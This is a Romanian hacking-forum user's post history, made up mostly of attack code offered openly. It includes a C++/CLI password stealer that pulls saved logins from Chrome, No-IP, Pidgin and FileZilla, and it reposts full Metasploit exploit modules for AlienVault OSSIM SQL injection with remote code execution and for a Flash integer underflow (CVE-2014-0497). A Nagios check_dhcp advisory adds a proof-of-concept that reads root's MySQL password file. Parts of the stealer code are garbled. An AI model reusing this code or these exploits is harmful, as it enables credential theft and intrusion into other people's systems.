M.cod3r
-
Posts
12 -
Joined
-
Last visited
Posts posted by M.cod3r
-
-
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
Dac? ai fi citit cu aten?ie aveai sursa in primele 2 rândule?e !
-
A?a acum to?i avea?i ideea dar nimeni nu a finalizato, felicit?rile mele nedo o treab? bine f?cut? !
-
Scoate patternul de pe header si footer sau inlocuiestel cu ceva mai subtil Subtle Patterns | Free textures for your next web project.
Umbra (sau ce vrea sa fie aia) schimbai culoarea intr-un gri inchis si fao mai mica si la header si la footer
Ai putea face albastrul ceva mai deschis.
Mai taie din footer, mi se pare mult prea mare :\
Deasemenea iti recomand sa folosesti niste palete de culori.
Color Combinations | Color Schemes | Color Palettes
Dac? vei face ce a fost spus mai sus, va ar?ta ?i mai bine
-
-
Respectele mele daca ii facut de tine.
L.E.:Mai dezamagit: ??? [C++] Password Stealer Codes
Cu tot respectul nu este f?cut 100% de mine , ! ?i dac? ai observat este o alt? variant? cu totul ?i cu totul diferit? fat? de ce-mi ar??i tu. !
Salut, te rog sa modifici in titlul topicului din [C++] in [C++/CLI], codul este in varianta de c++ ce este detinuta de microsoft si include componente .net. Nu este c++ curat.Rezolvat !
-
Mul?umim dl Nytro ne-ai ajutat foarte mult.
-
Google chrome
public:
void StealChrome()
{converted by Instant C++:
System::String ^cpass = System::String::empty;
System::String ^datapath = Environment::GetFolderPath(Environment::SpecialFolder::LocalApplicationData) + "\\Google\\Chrome\\User Data\\Default\\Web Data";
if (File::Exists(datapath))
{
SqlClient::SqlConnection ^SQLconnect = gcnew SqlClient::SqlConnection();
SqlClient::SqlCommand ^SQLcommand = nullptr;
SQLconnect->ConnectionString = "Data Source=" + datapath + ";";
SQLconnect->Open();
SQLcommand = SQLconnect->CreateCommand();
SQLcommand->CommandText = "SELECT * FROM logins";
SqlClient::SqlDataReader ^SQLreader = SQLcommand->ExecuteReader();
System::String ^host = nullptr;
System::String ^user = nullptr;
System::String ^pass = nullptr;
while (SQLreader->Read())
{
host = SQLreader["origin_url"];
user = SQLreader["username_value"];
pass = Decrypt(SQLreader["password_value"]);
if ((user != "") & (pass != ""))
{
pss->Text = host;
cpass = ("=============================" + System::Environment::NewLine + "Host: " + host + System::Environment::NewLine + "Username: " + user + System::Environment::NewLine + "Password: " + pass + System::Environment::NewLine + "=============================" + System::Environment::NewLine + " ");
}
}
delete SQLcommand;
SQLconnect->Close();
}
}
private:
[DllImport("Crypt32.dll", SetLastError=true, CharSet=System::Runtime::InteropServices::CharSet::Auto)]
static bool CryptUnprotectData(DATA_BLOB %pDataIn, System::String ^szDataDescr, DATA_BLOB %pOptionalEntropy, IntPtr pvReserved, CRYPTPROTECT_PROMPTSTRUCT %pPromptStruct, int dwFlags, DATA_BLOB %pDataOut);
[Flags()]
private enum class CryptProtectPromptFlags: int
{
CRYPTPROTECT_PROMPT_ON_UNPROTECT = 0X1,
CRYPTPROTECT_PROMPT_ON_PROTECT = 0X2
};
[StructLayout(LayoutKind::Sequential, CharSet=CharSet::Unicode)]
private value class CRYPTPROTECT_PROMPTSTRUCT
{
public:
int cbSize;
CryptProtectPromptFlags dwPromptFlags;
IntPtr hwndApp;
System::String ^szPrompt;
};
[StructLayout(LayoutKind::Sequential, CharSet=CharSet::Unicode)]
private value class DATA_BLOB
{
public:
int cbData;
IntPtr pbData;
};
public:
static System::String ^Decrypt(array<System::Byte> ^Datas)
{
DATA_BLOB inj = DATA_BLOB();
DATA_BLOB Ors = DATA_BLOB();
GCHandle Ghandle = GCHandle::Alloc(Datas, GCHandleType::Pinned);
inj.pbData = Ghandle.AddrOfPinnedObject();
inj.cbData = Datas->Length;
Ghandle.Free();
DATA_BLOB temppOptionalEntropy1 = DATA_BLOB();
CRYPTPROTECT_PROMPTSTRUCT temppPromptStruct2 = CRYPTPROTECT_PROMPTSTRUCT();
CryptUnprotectData(inj, nullptr, temppOptionalEntropy1, System::IntPtr::Zero, temppPromptStruct2, 0, Ors);
array<System::Byte> ^Returned = gcnew array<System::Byte>(Ors.cbData + 1);
Marshal::Copy(Ors.pbData, Returned, 0, Ors.cbData);
System::String ^TheString = Encoding::Default->GetString(Returned);
return TheString->Substring(0, TheString->Length - 1);
}
};No-ip:
public:
System::String ^NoIPSteal()
{
IpRecord = nullptr;
System::String ^Username = Microsoft::Win32::Registry::GetValue("HKEY_LOCAL_MACHINE\\SOFTWARE\\Vitalwerks\\DUC", "Username", nullptr);
System::String ^Password = Microsoft::Win32::Registry::GetValue("HKEY_LOCAL_MACHINE\\SOFTWARE\\Vitalwerks\\DUC", "Password", nullptr);
System::String ^NL = System::Environment::NewLine;
IpRecord = "===========No-Ip=============" + NL + "Username : " + Username + System::Environment::NewLine + "Password : " + base64Decode(Password) + System::Environment::NewLine + "=============================" + NL;must return a value in C++:
return nullptr;
}
private:
System::String ^Base64Dec0de(System::String ^%Base64String)
{
static array<System::Byte> ^Enc = nullptr;
array<System::Byte> ^b = nullptr;
array<System::Byte> ^Out = nullptr;
int i = 0;
int j = 0;
int L = 0;
array<System::Byte> ^Dec = gcnew array<System::Byte>(256);
if (Enc->Length == 0) //byval 0&-Ptr = not initialized
{
Enc = System::Text::ASCIIEncoding::ASCII->GetBytes("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/");
}
for (i = 0; i <= 255; i++)
{
Dec[i] = 64;
}
for (i = 0; i <= 63; i++)
{
Dec[Enc[i]] = System::Convert::ToByte(i);
}
L = Base64String->Length;
b = System::Text::ASCIIEncoding::ASCII->GetBytes(Base64String);
Array::Resize(Out, (L / 4) * 3);
for (i = 0; i <= b->GetUpperBound(0); i += 4)
{
Out[j] = System::Convert::ToByte((Dec[b[i]] * 4) | (Dec[b[i + 1]] / 16));
j = j + 1;
Out[j] = System::Convert::ToByte(System::Convert::ToInt16(Dec[b[i + 1]] & 15) * 16 | (Dec[b[i + 2]] / 4));
j = j + 1;
Out[j] = System::Convert::ToByte(System::Convert::ToInt16(Dec[b[i + 2]] & 3) * 64 | Dec[b[i + 3]]);
j = j + 1;
}
if (b[L - 2] == 61)
{
j = 2;
}
else if (b[L - 1] == 61)
{
j = 1;
}
else
{
j = 0;
}
Array::Resize(Out, Out->GetUpperBound(0) - j + 1);
Base64Dec = System::Text::ASCIIEncoding::ASCII->GetString(Out);must return a value in C++:
return nullptr;
}Pidgin:
public:
System::String ^PidginSteal()
{
System::String ^tempPidginSteal = nullptr;
XmlDocument ^ReadXML = gcnew XmlDocument();
int i = 0;
System::Object ^OutAll = nullptr;
tempPidginSteal = "";
System::String ^FilePath = Microsoft::VisualBasic::Interaction::Environ("appdata") + "\\.purple\\accounts.xml";
if (File::Exists(FilePath) != true)
{
return tempPidginSteal;
}
else
{
try
{
ReadXML->Load(FilePath);
XmlNodeList ^Protocol = ReadXML->GetElementsByTagName("protocol");
XmlNodeList ^Username = ReadXML->GetElementsByTagName("name");
XmlNodeList ^Password = ReadXML->GetElementsByTagName("password");
for (i = 0; i < Protocol->Count; i++)
{
OutAll = OutAll->ToString() + "============Pidgin===========" + System::Environment::NewLine + "Protocol: " + Protocol[i]->InnerText + "\r\n" + "Username: " + Username[i]->InnerText + "\r\n" + "Password: " + Password[i]->InnerText + "\r\n" + System::Environment::NewLine + "=============================" + System::Environment::NewLine;
}
tempPidginSteal = OutAll;
}
catch (Exception ^ex)
{
}
}
return tempPidginSteal;
)Fillezila
public:
System::String ^FileZillaSteal()
{
System::String ^FilePath = Microsoft::VisualBasic::Interaction::Environ("APPDATA") + "\\FileZilla\\recentservers.xml";
System::String ^FileBuffer = Microsoft::VisualBasic::Constants::vbNull;
System::String ^NL = System::Environment::NewLine;
FileBuffer = Microsoft::VisualBasic::FileIO::FileSystem::OpenTextFileReader(FilePath)::ReadTo???End();
System::String ^str = nullptr;
System::String ^Output = nullptr;
array<System::String^> ^TempData = nullptr;
TempData = FileBuffer->Split("\r\n");
FileBuffer = nullptr;
for each (System::String ^str in TempData)
{
if (str->Contains("</Host>"))
{
str->Replace("<Host>", "")->Replace("</Host>", "");
Output = Output + "Host : " + str + NL;
}
if (str->Contains("</User>"))
{
str->Replace("<User>", "")->Replace("</User>", "");
Output = Output + "Username : " + str + NL;
}
if (str->Contains("</Pass>"))
{
str->Replace("<Pass>", "")->Replace("</Pass>", "");
Output = Output + "Password : " + str + NL + NL;
}
}
Output = "=============FileZilla================" + System::Environment::NewLine + Output->Replace("<User>", "")->Replace("</User>", "")->Replace("<Host>", "")->Replace("</Host>", "")->Replace("<Pass>", "")->Replace("</Pass>", "") + System::Environment::NewLine + "=============FileZilla================" + System::Environment::NewLine;
ShoitZilla = Output;must return a value in C++:
return nullptr;
} -
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => "AlienVault OSSIM SQL Injection and Remote Code Execution",
'Description' => %q{
This module exploits an unauthenticated SQL injection vulnerability affecting AlienVault
OSSIM versions 4.3.1 and lower. The SQL injection issue can be abused in order to retrieve an
active admin session ID. If an administrator level user is identified, remote code execution
can be gained by creating a high priority policy with an action containing our payload.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Sasha Zivojinovic', # SQLi discovery
'xistence <xistence[at]0x90.nl>' # Metasploit module
],
'References' =>
[
['OSVDB', '106252'],
['EDB', '33006']
],
'DefaultOptions' =>
{
'SSL' => true,
'WfsDelay' => 10
},
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Payload' =>
{
'Compat' =>
{
'RequiredCmd' => 'generic perl python',
}
},
'Targets' =>
[
['Alienvault OSSIM 4.3', {}]
],
'Privileged' => true,
'DisclosureDate' => "Apr 24 2014",
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(443),
OptString.new('TARGETURI', [true, 'The URI of the vulnerable Alienvault OSSIM instance', '/'])
], self.class)
end
def check
marker = rand_text_alpha(6)
sqli_rand = rand_text_numeric(4+rand(4))
sqli = "' and(select 1 from(select count(*),concat((select (select concat(0x#{marker.unpack('H*')[0]},Hex(cast(user() as char)),0x#{marker.unpack('H*')[0]})) "
sqli << "from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '#{sqli_rand}'='#{sqli_rand}"
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'geoloc', 'graph_geoloc.php'),
'vars_get' => { 'date_from' => sqli }
})
if res && res.code == 200 && res.body =~ /#{marker}726F6F7440[0-9a-zA-Z]+#{marker}/ # 726F6F7440 = root
return Exploit::CheckCode::Vulnerable
else
print_status("#{res.body}")
return Exploit::CheckCode::Safe
end
end
def exploit
marker = rand_text_alpha(6)
sqli_rand = rand_text_numeric(4+rand(4))
sqli = "' and (select 1 from(select count(*),concat((select (select concat(0x#{marker.unpack('H*')[0]},Hex(cast(id as char)),0x#{marker.unpack('H*')[0]})) "
sqli << "from alienvault.sessions where login='admin' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '#{sqli_rand}'='#{sqli_rand}"
print_status("#{peer} - Trying to grab admin session through SQLi")
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'geoloc', 'graph_geoloc.php'),
'vars_get' => { 'date_from' => sqli }
})
if res && res.code == 200 && res.body =~ /#{marker}(.*)#{marker}/
admin_session = $1
@cookie = "PHPSESSID=" + ["#{admin_session}"].pack("H*")
print_status("#{peer} - Admin session cookie is [ #{@cookie} ]")
else
fail_with(Failure::Unknown, "#{peer} - Failure retrieving admin session")
end
# Creating an Action containing our payload, which will be executed by any event (not only alarms)
action = rand_text_alpha(8+(rand(8)))
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, "ossim", "action", "modifyactions.php"),
'cookie' => @cookie,
'vars_post' => {
'action' => 'new',
'action_name' => action,
'descr' => action,
'action_type' => '2',
'only' => 'on',
'cond' => 'True',
'exec_command' => payload.encoded
}
})
if res && res.code == 200
print_status("#{peer} - Created Action [ #{action} ]")
else
fail_with(Failure::Unknown, "#{peer} - Action creation failed!")
end
# Retrieving the Action ID, used to clean up the action after successful exploitation
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, "ossim", "action", "getaction.php"),
'cookie' => @cookie,
'vars_post' => {
'page' => '1',
'rp' => '2000'
}
})
if res && res.code == 200 && res.body =~ /actionform\.php\?id=(.*)'>#{action}/
@action_id = $1
print_status("#{peer} - Action ID is [ #{@action_id} ]")
else
fail_with(Failure::Unknown, "#{peer} - Action ID retrieval failed!")
end
# Retrieving the policy data, necessary for proper cleanup after succesful exploitation
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path.to_s, "ossim", "policy", "policy.php"),
'cookie' => @cookie,
'vars_get' => {
'm_opt' => 'configuration',
'sm_opt' => 'threat_intelligence',
'h_opt' => 'policy'
}
})
if res && res.code == 200 && res.body =~ /getpolicy\.php\?ctx=(.*)\&group=(.*)',/
policy_ctx = $1
policy_group = $2
print_status("#{peer} - Policy data [ ctx=#{policy_ctx} ] and [ group=#{policy_group} ] retrieved!")
else
fail_with(Failure::Unknown, "#{peer} - Retrieving Policy data failed!")
end
# Creating policy which will be triggered by any source/destination
policy = rand_text_alpha(8+(rand(8)))
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, "ossim", "policy", "newpolicy.php"),
'cookie' => @cookie,
'vars_post' => {
'descr' => policy,
'active' => '1',
'group' => policy_group,
'ctx' => policy_ctx,
'order' => '1', # Makes this the first policy, overruling all the other policies
'action' => 'new',
'sources[]' => '00000000000000000000000000000000', # Source is ANY
'dests[]' => '00000000000000000000000000000000', # Destination is ANY
'portsrc[]' => '0', # Any source port
'portdst[]' => '0', # Any destination port
'plug_type' => '1', # Taxonomy
'plugins[0]' => 'on',
'taxfilters[]' =>'20@13@118', # Product Type: Operating System, Category: Application, Subcategory: Web - Not Found
'tax_pt' => '0',
'tax_cat' => '0',
'tax_subc' => '0',
'mboxs[]' => '00000000000000000000000000000000',
'rep_act' => '0',
'rep_sev' => '1',
'rep_rel' => '1',
'rep_dir' => '0',
'ev_sev' => '1',
'ev_rel' => '1',
'tzone' => 'Europe/Amsterdam',
'date_type' => '1',
'begin_hour' => '0',
'begin_minute' => '0',
'begin_day_week' => '1',
'begin_day_month' => '1',
'begin_month' => '1',
'end_hour' => '23',
'end_minute' => '59',
'end_day_week' => '7',
'end_day_month' => '31',
'end_month' => '12',
'actions[]' => @action_id,
'sim' => '1',
'priority' => '1',
'qualify' => '1',
'correlate' => '0', # Don't make any correlations
'cross_correlate' => '0', # Don't make any correlations
'store' => '0' # We don't want to store anything
}
})
if res && res.code == 200
print_status("#{peer} - Created Policy [ #{policy} ]")
else
fail_with(Failure::Unknown, "#{peer} - Policy creation failed!")
end
# Retrieve policy ID, needed for proper cleanup after succesful exploitation
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, "ossim", "policy", "getpolicy.php"),
'cookie' => @cookie,
'vars_get' => {
'ctx' => policy_ctx,
'group' => policy_group
},
'vars_post' => {
'page' => '1',
'rp' => '2000'
}
})
if res && res.code == 200 && res.body =~ /row id='(.*)' col_order='1'/
@policy_id = $1
print_status("#{peer} - Policy ID [ #{@policy_id} ] retrieved!")
else
fail_with(Failure::Unknown, "#{peer} - Retrieving Policy ID failed!")
end
# Reload the policies to make our new policy active
print_status("#{peer} - Reloading Policies")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "ossim", "conf", "reload.php"),
'cookie' => @cookie,
'vars_get' => {
'what' => 'policies',
'back' => '../policy/policy.php'
}
})
if res && res.code == 200
print_status("#{peer} - Policies reloaded!")
else
fail_with(Failure::Unknown, "#{peer} - Policy reloading failed!")
end
# Request a non-existing page, which will trigger a SIEM event (and thus our payload), but not an alarm.
dont_exist = rand_text_alpha(8+rand(4))
print_status("#{peer} - Triggering policy and action by requesting a non existing url")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, dont_exist),
'cookie' => @cookie
})
if res and res.code == 404
print_status("#{peer} - Payload delivered")
else
fail_with(Failure::Unknown, "#{peer} - Payload failed!")
end
end
def cleanup
begin
# Clean up, retrieve token so that the policy can be removed
print_status("#{peer} - Cleaning up")
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, "ossim", "session", "token.php"),
'cookie' => @cookie,
'vars_post' => { 'f_name' => 'delete_policy' }
})
if res && res.code == 200 && res.body =~ /\{\"status\":\"OK\",\"data\":\"(.*)\"\}/
token = $1
print_status("#{peer} - Token [ #{token} ] retrieved")
else
print_warning("#{peer} - Unable to retrieve token")
end
# Remove our policy
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "ossim", "policy", "deletepolicy.php"),
'cookie' => @cookie,
'vars_get' => {
'confirm' => 'yes',
'id' => @policy_id,
'token' => token
}
})
if res && res.code == 200
print_status("#{peer} - Policy ID [ #{@policy_id} ] removed")
else
print_warning("#{peer} - Unable to remove Policy ID")
end
# Remove our action
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "ossim", "action", "deleteaction.php"),
'cookie' => @cookie,
'vars_get' => {
'id' => @action_id,
}
})
if res && res.code == 200
print_status("#{peer} - Action ID [ #{@action_id} ] removed")
else
print_warning("#{peer} - Unable to remove Action ID")
end
# Reload the policies to revert back to the state before exploitation
print_status("#{peer} - Reloading Policies")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "ossim", "conf", "reload.php"),
'cookie' => @cookie,
'vars_get' => {
'what' => 'policies',
'back' => '../policy/policy.php'
}
})
if res && res.code == 200
print_status("#{peer} - Policies reloaded!")
else
fail_with(Failure::Unknown, "#{peer} - Policy reloading failed!")
end
ensure
super # mixins should be able to cleanup even in case of Exception
end
end
end
@
-
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::BrowserExploitServer
def initialize(info={})
super(update_info(info,
'Name' => "Adobe Flash Player Integer Underflow Remote Code Execution",
'Description' => %q{
This module exploits a vulnerability found in the ActiveX component of Adobe Flash Player
before 12.0.0.43. By supplying a specially crafted swf file it is possible to trigger an
integer underflow in several avm2 instructions, which can be turned into remote code
execution under the context of the user, as exploited in the wild in February 2014. This
module has been tested successfully with Adobe Flash Player 11.7.700.202 on Windows XP
SP3, Windows 7 SP1 and Adobe Flash Player 11.3.372.94 on Windows 8 even when it includes
rop chains for several Flash 11 versions, as exploited in the wild.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Unknown', # vulnerability discovery and exploit in the wild
'juan vazquez' # msf module
],
'References' =>
[
[ 'CVE', '2014-0497' ],
[ 'OSVDB', '102849' ],
[ 'BID', '65327' ],
[ 'URL', 'http://helpx.adobe.com/security/products/flash-player/apsb14-04.html' ],
[ 'URL', 'http://blogs.technet.com/b/mmpc/archive/2014/02/17/a-journey-to-cve-2014-0497-exploit.aspx' ],
[ 'URL', 'http://blog.vulnhunt.com/index.php/2014/02/20/cve-2014-0497_analysis/' ]
],
'Payload' =>
{
'Space' => 1024,
'DisableNops' => true
},
'DefaultOptions' =>
{
'InitialAutoRunScript' => 'migrate -f',
'Retries' => false
},
'Platform' => 'win',
# Versions targeted in the wild:
# [*] Windows 8:
# 11,3,372,94, 11,3,375,10, 11,3,376,12, 11,3,377,15, 11,3,378,5, 11,3,379,14
# 11,6,602,167, 11,6,602,171 ,11,6,602,180
# 11,7,700,169, 11,7,700,202, 11,7,700,224
# [*] Before windows 8:
# 11,0,1,152,
# 11,1,102,55, 11,1,102,62, 11,1,102,63
# 11,2,202,228, 11,2,202,233, 11,2,202,235
# 11,3,300,257, 11,3,300,273
# 11,4,402,278
# 11,5,502,110, 11,5,502,135, 11,5,502,146, 11,5,502,149
# 11,6,602,168, 11,6,602,171, 11,6,602,180
# 11,7,700,169, 11,7,700,202
# 11,8,800,97, 11,8,800,50
'BrowserRequirements' =>
{
:source => /script|headers/i,
:clsid => "{D27CDB6E-AE6D-11cf-96B8-444553540000}",
:method => "LoadMovie",
:os_name => Msf::OperatingSystems::WINDOWS,
:ua_name => Msf::HttpClients::IE,
:flash => lambda { |ver| ver =~ /^11\./ }
},
'Targets' =>
[
[ 'Automatic', {} ]
],
'Privileged' => false,
'DisclosureDate' => "Feb 5 2014",
'DefaultTarget' => 0))
end
def exploit
@swf = create_swf
super
end
def on_request_exploit(cli, request, target_info)
print_status("Request: #{request.uri}")
if request.uri =~ /\.swf$/
print_status("Sending SWF...")
send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Pragma' => 'no-cache'})
return
end
print_status("Sending HTML...")
tag = retrieve_tag(cli, request)
profile = get_profile(tag)
profile[:tried] = false unless profile.nil? # to allow request the swf
send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})
end
def exploit_template(cli, target_info)
swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
shellcode = get_payload(cli, target_info).unpack("H*")[0]
html_template = %Q|<html>
<body>
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
<param name="movie" value="<%=swf_random%>" />
<param name="allowScriptAccess" value="always" />
<param name="FlashVars" value="id=<%=shellcode%>" />
<param name="Play" value="true" />
</object>
</body>
</html>
|
return html_template, binding()
end
def create_swf
path = ::File.join( Msf::Config.data_directory, "exploits", "CVE-2014-0497", "Vickers.swf" )
swf = ::File.open(path, 'rb') { |f| swf = f.read }
swf
end
end -
=============================================
- Release date: 15.05.2014
- Discovered by: Dawid Golunski
- Severity: Moderate
=============================================
I. VULNERABILITY
-------------------------
check_dhcp - Nagios Plugins <= 2.0.1 Arbitrary Option File Read
II. BACKGROUND
-------------------------
"Nagios is an open source computer system monitoring, network monitoring and
infrastructure monitoring software application. Nagios offers monitoring and
alerting services for servers, switches, applications, and services.
It alerts the users when things go wrong and alerts them a second time when
the problem has been resolved.
Nagios Plugins (Official)
The Nagios Plugins Development Team maintains a bundle of more than fifty
standard plugins for Nagios and other monitoring applications that use the
straightforward plugin interface originally invented by the Nagios folks.
Each plugin is a stand-alone command line tool that provides a specific type
of check. Typically, your monitoring software runs these plugins to determine
the current status of hosts and services on your network.
Some of the provided plugins let you check local system metrics (such as load
averages, processes, or disk space usage), others use various network protocols
(such as ICMP, SNMP, or HTTP) to perform remote checks.
This allows for checking a large number of common host and service types.
* check_dhcp plugin
This plugin tests the availability of DHCP servers on a network."
III. INTRODUCTION
-------------------------
check_dhcp plugin that is a part of the official Nagios Plugins package contains
a vulnerability that allows a malicious attacker to read parts of INI
config files belonging to root on a local system. It could allow an attacker
to obtain sensitive information like passwords that should only be accessible
by root user.
The vulnerability is due to check_dhcp plugin having Root SUID permissions and
inappropriate access control when reading user provided config file.
IV. DESCRIPTION
-------------------------
check_dhcp requires a root SUID permission on the program binary file in order to run
correctly. Default installation of check_dhcp when installed from sources assigns
the setuid bit automatically on the file:
# ./configure ; make ; make install
# ls -l /usr/local/nagios/libexec/check_dhcp
-r-sr-xr-x 1 root root 171188 May 12 23:26 /usr/local/nagios/libexec/check_dhcp
As we can see in the provided help the plugin allows for reading options from a
supplied config file by using --extra-opts option:
# /usr/local/nagios/libexec/check_dhcp --help
check_dhcp v2.0.1 (nagios-plugins 2.0.1)
...
Usage:
check_dhcp [-v] [-u] [-s serverip] [-r requestedip] [-t timeout]
[-i interface] [-m mac]
Options:
...
--extra-opts=[section][@file]
Read options from an ini file. See
https://www.nagios-plugins.org/doc/extra-opts.html
for usage and examples.
The option could be used to read parts of any INI format config files
available on the system. Because check_dhcp is running as root (thanks
to SETUID bit) and does not drop the root privileges when accessing the
config file nor does it check if a given file should be accessible by the
user executing it any root ini-config file can be accessed this way by an
unprivileged user on the local system.
Ironically, the extra-opts.html document states
"The initial use case for this functionality is for hiding passwords, so
you do not have to define sensitive credentials in the Nagios configuration
and these options won't appear in the command line."
V. PROOF OF CONCEPT
-------------------------
A good example of a program that stores configuration in INI format is MySQL.
Administrators often save mysql credentials in /root/.my.cnf to avoid having
to type them each time when running a mysql client. Storing mysql passwords in
a config file is also suggested for safety in MySQL docs :
http://dev.mysql.com/doc/refman/5.7/en/password-security-user.html
An example mysql config file could look like this:
# cat /root/.my.cnf
[mysqldump]
quick
[mysql]
# saved password for the mysql root user
password=myRootSecretMysqlPass123
If an unprivileged attacker had access to a system containing SUID binary of
check_dhcp plugin he could easily use it to retrieve the password contained
in /root/.my.cnf file:
[attacker@localhost ~]$ id
uid=500(attacker) gid=500(attacker) groups=500(attacker)
[attacker@localhost ~]$ /usr/local/nagios/libexec/check_dhcp -v --extra-opts=mysql@/root/.my.cnf
/usr/local/nagios/libexec/check_dhcp: unrecognized option '--password=myRootSecretMysqlPass123'
Usage:
check_dhcp [-v] [-u] [-s serverip] [-r requestedip] [-t timeout]
[-i interface] [-m mac]
As we can see the contents of the 'mysql' section of /root/.my.cnf option
file gets printed as a part of the error message revealing its contents to
the attacker.
VI. BUSINESS IMPACT
-------------------------
Malicious user that has local access to a system where check_dhcp plugin is
installed with SUID could exploit this vulnerability to read any INI format
config files owned by root and potentially extract some sensitive information.
VII. SYSTEMS AFFECTED
-------------------------
Systems with check_dhcp SUID binary installed as a part of Nagios Plugins 2.0.1 or older
are vulnerable.
VIII. SOLUTION
-------------------------
Remove SETUID permission bit from the check_dhcp binary file if the plugin is not used.
Vendor has been informed about the vulnerability prior to release of this advisory.
Install a newer version of the plugin when released by vendor.
IX. REFERENCES
-------------------------
http://exchange.nagios.org/directory/Plugins/*-Plugin-Packages/Nagios-Plugins-%28Official%29/details
http://www.nagios-plugins.org/download/nagios-plugins-2.0.1.tar.gz
https://nagios-plugins.org/doc/extra-opts.html
http://en.wikipedia.org/wiki/Setuid
http://en.wikipedia.org/wiki/INI_file
http://dev.mysql.com/doc/refman/5.7/en/password-security-user.html
http://legalhackers.com/advisories/nagios-check_dhcp.txt
X. CREDITS
-------------------------
The vulnerability has been discovered by Dawid Golunski
dawid (at) legalhackers (dot) com
legalhackers.com
XI. REVISION HISTORY
-------------------------
May 12th, 2014: Advisory created
XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with
no warranties or guarantees of fitness of use or otherwise. I accept no
responsibility for any damage caused by the use or misuse of this information. -
Numele meu este C?t?lin Marius am vârsta de 17 ani ?i sunt pasionat de IT , sunt la liceul Mate-Info din Bucure?ti , ?i cunosc câte pu?in din fiecare sql python asm c++ extrem de pu?in am venit aici s? înv?? de la cei mai buni !
Problema mouseport win 8.1
in Sisteme de operare si discutii hardware
Posted · Edited by aelius
Dac? ai rezolvat voi face un report pentru a fi închis subiectul .
// Ja Right!